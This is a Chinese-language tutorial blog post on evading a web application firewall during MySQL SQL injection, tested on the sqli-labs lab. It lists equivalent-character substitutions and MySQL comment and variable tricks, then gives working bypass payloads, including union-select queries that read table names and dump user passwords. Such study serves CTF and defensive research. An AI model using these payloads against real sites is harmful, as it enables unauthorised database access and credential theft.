SQL注入之BypassWaf

0x00 前言

无论是在CTF比赛中还是在现实项目中，都会遇到各种各样的waf，没有绝对安全的系统，仔细的研究总会发现被“漏掉”的地方。

最近在研究过waf的技巧，期间还是很有趣的，在这里与大家分享一下，仅个人见解，哪里写的不好欢迎各位师傅斧正！本文只研究 MySQL 数据库，其余有机会在分享。

sqli-labs

某常见最新版免费防护软件（仅作研究用）

windows2008+phpstudy

0x01 等价字符

空格：%20,+,(),%0a,%09,%a0,%0b,%0c,%0d,/**/等

=：like，regexp，liker，<>，！=等 （一般ctf中常见）

and：&&

or: xor，&，^，||（and或or可以相互替换，只是两边条件不同）

逗号：盲注中 from 1 for 1,联合查询中 A join B。

关于替换字符自行fuzz尝试，方法还有很多。

0x02 MySQL的特性

有必要了解一些MySQL的特性，这样有助于绕过waf的规则。

=，:=，@

MySQL中“=”为等于的意思，只有在update set时为赋值的意思。

“:=”为赋值的意思。

在MySQL中变量不需要定义，利用@+变量名可直接调用。

在MySQL中可以使用的注释符有：

/**/ 可用于多行注释。

–(我是空格)，#。

但是在MySQL中有一个独有的特性就是注释符中叹号后面的内容仍可以解析，比如/*!and*/,并且叹号后面的数字小于或等于MySQL版本号的话同样会解析。

在MySQL中换行后内容会继续执行

MySQL的隐式类型转换

先看两个示例，应该就很容易明白了。

你懂我意思吧:)

绕waf的一些想法

前面的铺垫做完了，接下来实现一些想法。

判断注入点

经测试:

and //不拦截
and a //不拦截
and ！//不拦截
and 1 //拦截

可以发现，当and连接数字时waf会进行拦截，因此只需要在数字或者and与数字中间进行干扰即可。

and /*!1=1*/
and--+a%0a1/*!=*/1
and @s1ye:=1/0

注入点确定后，分别测试一下盲注与联合查询注入。

利用MySQL变量进行盲注

在圈子看到一篇盲注的payload总结，感觉还是有些麻烦了。可以利用 @x :=来构造一个简单的payload:

and @s1ye:=length(database/**/())

其他payload可以利用 注释符—+加任意干扰字符加换行符%0a来进行绕过。主要的思路就是利用参数污染来干扰waf的规则。

利用MySQL的隐式类型转换进行盲注

简单说一下：

select * from test where id = '1'-(length(database())>0)+'1';
即 id= 1-1+1

联合查询注入

union //不拦截
select //不拦截
union select //拦截

当waf拦截了哪种组合，利用注释加换行即可，效果如下所示，发现可以正常执行。

payload:
-1' union--+x%0aselect 1,2,3--+

接下来读取数据库数据

-1' union--+x%0aselect 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

发现被拦截，fuzz发现waf会过滤掉函数，以及group_concat(table_name) from，这里去掉from前的空格，database()=>database () 或 database/**/()。

这里也可以利用database()的0x16进制。

读取用户名密码

union--x%0aselect 1,2,group_concat(password)from users

/*/配合注释符/**/有奇效，可自行测试。

以下为整理的waf中可用的系统变量及函数：

@@version/**/
user/**/()
database/**/()
/**/@@version_compile_os

系统变量的注释符放在前后都可。

总结

对于绕waf，我的理解为，多了解一些数据库的特性，一些不常见小的技巧、函数等，分析waf的规则，在MySQL命令行中fuzz即可，waf规则总有漏网之鱼。

最后，文章只是记录自己学习的过程，有些payload不是很完善，仅仅是一些想法分享。